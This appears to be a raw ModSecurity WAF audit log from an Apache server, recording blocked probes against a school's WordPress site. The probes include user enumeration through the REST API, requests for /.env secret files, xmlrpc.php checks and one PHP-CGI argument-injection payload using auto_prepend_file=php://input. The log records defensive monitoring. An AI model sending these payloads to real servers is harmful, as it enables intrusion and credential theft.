Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18d46348-Z-- --3bd9a53f-A-- [26/Apr/2025:07:12:58 +0700] aAwlCtDEbIDiBZnoTx4EvQAAAEs 103.236.140.4 46604 103.236.140.4 8181 --3bd9a53f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3bd9a53f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3bd9a53f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745626378125849 2784 (- - -) Stopwatch2: 1745626378125849 2784; combined=1437, p1=466, p2=939, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bd9a53f-Z-- --2b96a847-A-- [26/Apr/2025:07:13:00 +0700] aAwlDNQ6lpQjDvc0F_NocgAAANA 103.236.140.4 46620 103.236.140.4 8181 --2b96a847-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2b96a847-C-- demo.sayHello --2b96a847-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b96a847-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745626380878999 6299 (- - -) Stopwatch2: 1745626380878999 6299; combined=4600, p1=591, p2=3767, p3=31, p4=35, p5=103, sr=93, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b96a847-Z-- --72844424-A-- [26/Apr/2025:07:15:47 +0700] aAwls03IXD9XJ6lrmIWepAAAAA4 103.236.140.4 47274 103.236.140.4 8181 --72844424-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.15 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --72844424-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72844424-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745626547193448 3116 (- - -) Stopwatch2: 1745626547193448 3116; combined=1355, p1=480, p2=823, p3=0, p4=0, p5=52, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72844424-Z-- --33a3267c-A-- [26/Apr/2025:07:15:50 +0700] aAwlttDEbIDiBZnoTx4E4QAAAEY 103.236.140.4 47290 103.236.140.4 8181 --33a3267c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.15 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.15 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --33a3267c-C-- demo.sayHello --33a3267c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --33a3267c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745626550952653 6644 (- - -) Stopwatch2: 1745626550952653 6644; combined=4740, p1=578, p2=3906, p3=37, p4=44, p5=103, sr=74, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33a3267c-Z-- --6f958d4e-A-- [26/Apr/2025:07:21:01 +0700] aAwm7dDEbIDiBZnoTx4FEgAAAEQ 103.236.140.4 48462 103.236.140.4 8181 --6f958d4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6f958d4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f958d4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745626861704658 2618 (- - -) Stopwatch2: 1745626861704658 2618; combined=1081, p1=375, p2=682, p3=0, p4=0, p5=24, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f958d4e-Z-- --a0da7210-A-- [26/Apr/2025:07:21:04 +0700] aAwm8HGCMLWH05JCdxzhjgAAAJU 103.236.140.4 48480 103.236.140.4 8181 --a0da7210-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.230 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a0da7210-C-- demo.sayHello --a0da7210-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0da7210-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745626864496297 6292 (- - -) Stopwatch2: 1745626864496297 6292; combined=4301, p1=522, p2=3497, p3=28, p4=33, p5=125, sr=72, sw=96, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0da7210-Z-- --57ed667e-A-- [26/Apr/2025:08:31:48 +0700] aAw3hNQ6lpQjDvc0F_NxlwAAANY 103.236.140.4 56372 103.236.140.4 8181 --57ed667e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.159.155.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.159.155.105 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --57ed667e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57ed667e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745631108917607 3136 (- - -) Stopwatch2: 1745631108917607 3136; combined=1381, p1=470, p2=864, p3=0, p4=0, p5=46, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57ed667e-Z-- --b967154a-A-- [26/Apr/2025:09:07:02 +0700] aAw_xtDEbIDiBZnoTx4isAAAAEc 103.236.140.4 50800 103.236.140.4 8181 --b967154a-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 142.93.129.190 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 142.93.129.190 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --b967154a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b967154a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745633222190932 738 (- - -) Stopwatch2: 1745633222190932 738; combined=251, p1=221, p2=0, p3=0, p4=0, p5=30, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b967154a-Z-- --fcb74931-A-- [26/Apr/2025:09:07:17 +0700] aAw_1XGCMLWH05JCdxz55wAAAJQ 103.236.140.4 51402 103.236.140.4 8181 --fcb74931-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.158.93.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.158.93.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fcb74931-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fcb74931-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745633237424305 2507 (- - -) Stopwatch2: 1745633237424305 2507; combined=1167, p1=400, p2=740, p3=0, p4=0, p5=27, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fcb74931-Z-- --e43aba64-A-- [26/Apr/2025:09:15:04 +0700] aAxBqNDEbIDiBZnoTx4m4gAAAFY 103.236.140.4 40270 103.236.140.4 8181 --e43aba64-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 107.161.179.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 107.161.179.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e43aba64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e43aba64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745633704843941 3751 (- - -) Stopwatch2: 1745633704843941 3751; combined=1916, p1=616, p2=1265, p3=0, p4=0, p5=35, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e43aba64-Z-- --f85a982b-A-- [26/Apr/2025:09:28:58 +0700] aAxE6k3IXD9XJ6lrmIXILgAAAAk 103.236.140.4 60228 103.236.140.4 8181 --f85a982b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.108.152.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.108.152.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f85a982b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f85a982b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745634538458764 2113 (- - -) Stopwatch2: 1745634538458764 2113; combined=868, p1=285, p2=560, p3=0, p4=0, p5=23, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f85a982b-Z-- --7b666c57-A-- [26/Apr/2025:09:54:28 +0700] aAxK5NDEbIDiBZnoTx44FgAAAFY 103.236.140.4 55564 103.236.140.4 8181 --7b666c57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 107.170.12.138 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 107.170.12.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --7b666c57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b666c57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745636068147153 834 (- - -) Stopwatch2: 1745636068147153 834; combined=353, p1=309, p2=0, p3=0, p4=0, p5=43, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b666c57-Z-- --e0c23b0f-A-- [26/Apr/2025:10:17:10 +0700] aAxQNtQ6lpQjDvc0F_OrIgAAANQ 103.236.140.4 49252 103.236.140.4 8181 --e0c23b0f-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 165.227.173.41 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 165.227.173.41 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --e0c23b0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0c23b0f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745637430589356 779 (- - -) Stopwatch2: 1745637430589356 779; combined=307, p1=271, p2=0, p3=0, p4=0, p5=36, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0c23b0f-Z-- --cf25c939-A-- [26/Apr/2025:10:32:38 +0700] aAxT1tDEbIDiBZnoTx5FhAAAAE8 103.236.140.4 55596 103.236.140.4 8181 --cf25c939-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 216.10.250.218 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 216.10.250.218 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --cf25c939-C-- --cf25c939-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf25c939-E-- --cf25c939-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745638358227177 4993 (- - -) Stopwatch2: 1745638358227177 4993; combined=3409, p1=594, p2=2776, p3=0, p4=0, p5=39, sr=132, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf25c939-Z-- --ce606115-A-- [26/Apr/2025:10:40:57 +0700] aAxVydDEbIDiBZnoTx5GMQAAAE4 103.236.140.4 57606 103.236.140.4 8181 --ce606115-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.103.206.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.103.206.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ce606115-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce606115-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745638857464161 3096 (- - -) Stopwatch2: 1745638857464161 3096; combined=1504, p1=522, p2=951, p3=0, p4=0, p5=31, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce606115-Z-- --ec8b180e-A-- [26/Apr/2025:12:08:40 +0700] aAxqWHGCMLWH05JCdxwgIQAAAI0 103.236.140.4 49786 103.236.140.4 8181 --ec8b180e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.123.207.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.123.207.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ec8b180e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec8b180e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745644120715244 2830 (- - -) Stopwatch2: 1745644120715244 2830; combined=1227, p1=414, p2=784, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec8b180e-Z-- --f5ed3922-A-- [26/Apr/2025:12:13:40 +0700] aAxrhNDEbIDiBZnoTx5KWwAAAE0 103.236.140.4 50886 103.236.140.4 8181 --f5ed3922-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.92.155.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.92.155.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f5ed3922-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5ed3922-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745644420491778 3541 (- - -) Stopwatch2: 1745644420491778 3541; combined=1533, p1=521, p2=973, p3=0, p4=0, p5=39, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5ed3922-Z-- --84080413-A-- [26/Apr/2025:12:17:45 +0700] aAxseXGCMLWH05JCdxwhLwAAAII 103.236.140.4 51836 103.236.140.4 8181 --84080413-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: 